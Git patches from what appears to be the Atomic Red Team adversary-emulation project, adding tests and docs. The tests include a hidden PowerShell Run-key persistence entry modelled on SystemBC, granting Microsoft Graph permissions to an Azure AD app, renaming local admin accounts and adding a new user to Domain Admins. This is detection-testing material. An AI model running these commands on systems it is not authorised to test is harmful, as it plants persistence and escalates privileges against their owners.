+  auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
   description: |
       This Atomic will create a registry key called socks5_powershell for persistance access
       https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index fb1c1628..a7f1b71c 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -927,3 +927,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e
 3e757ce7-eca0-411a-9583-1c33b8508d52
 8d85a5d8-702f-436f-bc78-fcd9119496fc
 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+9dc7767b-30c1-4cc4-b999-50cab5e27891

From 20df4c72622701af34ee407dea8215177659f72c Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 16 Mar 2022 03:52:57 +0000
Subject: [PATCH 58/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  2 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  2 +
 atomics/Indexes/Indexes-Markdown/index.md     |  2 +
 .../Indexes/Indexes-Markdown/windows-index.md |  2 +
 atomics/Indexes/index.yaml                    | 50 +++++++++++++++++++
 atomics/T1547.001/T1547.001.md                | 42 ++++++++++++++++
 6 files changed, 100 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index d9dd67a6..d812889d 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -241,6 +241,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious j
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -724,6 +725,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5878040a..3c78d0fd 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -162,6 +162,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious j
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -493,6 +494,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 10082dba..9c2ac914 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -407,6 +407,7 @@
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
   - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -1159,6 +1160,7 @@
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
   - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
   - Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 78c1737f..777a40d0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -294,6 +294,7 @@
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
   - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -823,6 +824,7 @@
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
   - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 6074038f..bd91439f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18231,6 +18231,31 @@ privilege-escalation:
         cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
           /f
         name: command_prompt
+    - name: SystemBC Malware-as-a-Service Registry
+      auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
+      description: |
+        This Atomic will create a registry key called socks5_powershell for persistance access
+        https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+      supported_platforms:
+      - windows
+      input_arguments:
+        reg_key_value:
+          description: Thing to Run
+          type: Path
+          default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+        reg_key_path:
+          description: Path to registry key to update
+          type: Path
+          default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+      executor:
+        command: |
+          $RunKey = "#{reg_key_path}"
+          Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
+          -Force -ErrorAction Ignore
+
+'
+        name: powershell
   T1134.005:
     technique:
       external_references:
@@ -49404,6 +49429,31 @@ persistence:
         cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
           /f
         name: command_prompt
+    - name: SystemBC Malware-as-a-Service Registry
+      auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
+      description: |
+        This Atomic will create a registry key called socks5_powershell for persistance access
+        https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+      supported_platforms:
+      - windows
+      input_arguments:
+        reg_key_value:
+          description: Thing to Run
+          type: Path
+          default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+        reg_key_path:
+          description: Path to registry key to update
+          type: Path
+          default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+      executor:
+        command: |
+          $RunKey = "#{reg_key_path}"
+          Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
+          -Force -ErrorAction Ignore
+
+'
+        name: powershell
   T1505.001:
     technique:
       external_references:
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index 0d2a7137..f2704fe9 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -58,6 +58,8 @@ Adversaries can use these configuration locations to execute malware, such as re
 
 - [Atomic Test #8 - Add persistance via Recycle bin](#atomic-test-8---add-persistance-via-recycle-bin)
 
+- [Atomic Test #9 - SystemBC Malware-as-a-Service Registry](#atomic-test-9---systembc-malware-as-a-service-registry)
+
 
 <br/>
 
@@ -361,4 +363,44 @@ reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - SystemBC Malware-as-a-Service Registry
+This Atomic will create a registry key called socks5_powershell for persistance access
+https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9dc7767b-30c1-4cc4-b999-50cab5e27891
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| reg_key_value | Thing to Run | Path | powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File|
+| reg_key_path | Path to registry key to update | Path | HKCU:&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Run|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$RunKey = "#{reg_key_path}"
+Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

From 1fd5dc6a511fb3bd275e93b85746f71a3760b5c7 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 16 Mar 2022 19:30:25 +0000
Subject: [PATCH 59/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1098/T1098.yaml | 1 +
 atomics/used_guids.txt   | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index d1bfd288..37c597a7 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -417,6 +417,7 @@ atomic_tests:
     elevation_required: false
 
 - name: AzureAD - adding permission to application
+  auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
   description: |
     The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
     You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index a7f1b71c..acd113e5 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -928,3 +928,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e
 8d85a5d8-702f-436f-bc78-fcd9119496fc
 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
 9dc7767b-30c1-4cc4-b999-50cab5e27891
+94ea9cc3-81f9-4111-8dde-3fb54f36af4b

From 3906be5325a380b9508da810240d94ce728fc8ea Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 16 Mar 2022 19:30:30 +0000
Subject: [PATCH 60/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |   1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv   |   1 +
 atomics/Indexes/Indexes-Markdown/index.md     |   1 +
 .../Indexes/Indexes-Markdown/linux-index.md   |   1 +
 atomics/Indexes/index.yaml                    |  82 +++
 atomics/T1098/T1098.md                        | 659 ++++++++++++++++++
 6 files changed, 745 insertions(+)
 create mode 100644 atomics/T1098/T1098.md

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index d812889d..31890b17 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -643,6 +643,7 @@ persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e
 persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
+persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
 persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 649d2159..307e5c73 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -208,6 +208,7 @@ persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e
 persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
+persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 9c2ac914..9666ef5b 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -998,6 +998,7 @@
   - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
   - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
   - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #8: AzureAD - adding permission to application [azure-ad]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 133abe9d..458794af 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -464,6 +464,7 @@
   - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
   - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
   - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #8: AzureAD - adding permission to application [azure-ad]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index bd91439f..8754ec81 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -41683,6 +41683,88 @@ persistence:
           $($subscriptions.Name)\"\n"
         name: powershell
         elevation_required: false
+    - name: AzureAD - adding permission to application
+      auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+      description: |
+        The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+        You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+        The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+        The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+        Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+        You can also take a look at the materials:
+        https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+        https://github.com/reprise99/Sentinel-Queries
+        https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+        https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        application_name:
+          description: Name of the targed application
+          type: String
+          default: test_app
+        application_permission:
+          description: Permission from Microsoft Graph Resource API that will be add
+            to application
+          type: String
+          default: DirectoryRecommendations.Read.All
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String
+          \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication
+          -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal
+          -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication
+          | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service
+          Principal of Microsoft Graph Resource API \n$graphSP =  Get-AzureADServicePrincipal
+          -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize
+          RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess
+          = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId
+          = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set
+          Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission
+          = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess
+          = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type
+          = \"Role\"\n$resourceAccess.Id = $reqPermission.Id    \n#Add required app
+          permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host
+          \"App permission $permission not found in the Graph Resource API\" -ForegroundColor
+          Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object
+          System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set
+          permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId
+          -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal =
+          Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment
+          -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId
+          -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n"
+        cleanup_command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+          Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+        name: powershell
+        elevation_required: false
   T1547.014:
     technique:
       external_references:
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
new file mode 100644
index 00000000..e51e06c2
--- /dev/null
+++ b/atomics/T1098/T1098.md
@@ -0,0 +1,659 @@
+# T1098 - Account Manipulation
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098)
+<blockquote>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)
+
+- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate)
+
+- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group)
+
+- [Atomic Test #4 - Azure - adding user to Azure AD role](#atomic-test-4---azure---adding-user-to-azure-ad-role)
+
+- [Atomic Test #5 - Azure - adding service principal to Azure AD role](#atomic-test-5---azure---adding-service-principal-to-azure-ad-role)
+
+- [Atomic Test #6 - Azure - adding user to Azure role in subscription](#atomic-test-6---azure---adding-user-to-azure-role-in-subscription)
+
+- [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription)
+
+- [Atomic Test #8 - AzureAD - adding permission to application](#atomic-test-8---azuread---adding-permission-to-application)
+
+
+<br/>
+
+## Atomic Test #1 - Admin Account Manipulate
+Manipulate Admin Account Name
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$x = Get-Random -Minimum 2 -Maximum 9999
+$y = Get-Random -Minimum 2 -Maximum 9999
+$z = Get-Random -Minimum 2 -Maximum 9999
+$w = Get-Random -Minimum 2 -Maximum 9999
+Write-Host HaHa_$x$y$z
+
+$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name
+
+foreach($member in $fmm) {
+    if($member -like "*Administrator*") {
+        $account = $member.Name -replace ".+\\\","" # strip computername\
+        $originalDescription = (Get-LocalUser -Name $account).Description
+        Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
+        Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation
+        Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
+        }
+    }
+```
+
+#### Cleanup Commands:
+```powershell
+$list = Get-LocalUser |?{$_.Description -like "atr:*"}
+foreach($u in $list) {
+  $u.Description -match "atr:(?<Name>[^;]+);(?<Description>.*)"
+  Set-LocalUser -Name $u.Name -Description $Matches.Description
+  Rename-LocalUser -Name $u.Name -NewName $Matches.Name
+  Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME
+}
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Domain Account and Group Manipulate
+Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
+
+The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
+you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
+create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
+and is unlikely to work with Powershell Core (untested).
+
+If you consider running this test against a production Active Directory, the good practise is to create a dedicated
+service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
+as group manager of the target group.
+
+Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-|
+| group | Name of the group to alter | String | Domain Admins|
+| create_args | Additional string appended to New-ADUser call | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$x = Get-Random -Minimum 2 -Maximum 99
+$y = Get-Random -Minimum 2 -Maximum 99
+$z = Get-Random -Minimum 2 -Maximum 99
+$w = Get-Random -Minimum 2 -Maximum 99
+
+Import-Module ActiveDirectory
+$account = "#{account_prefix}-$x$y$z"
+New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+Add-ADGroupMember "#{group}" $account
+```
+
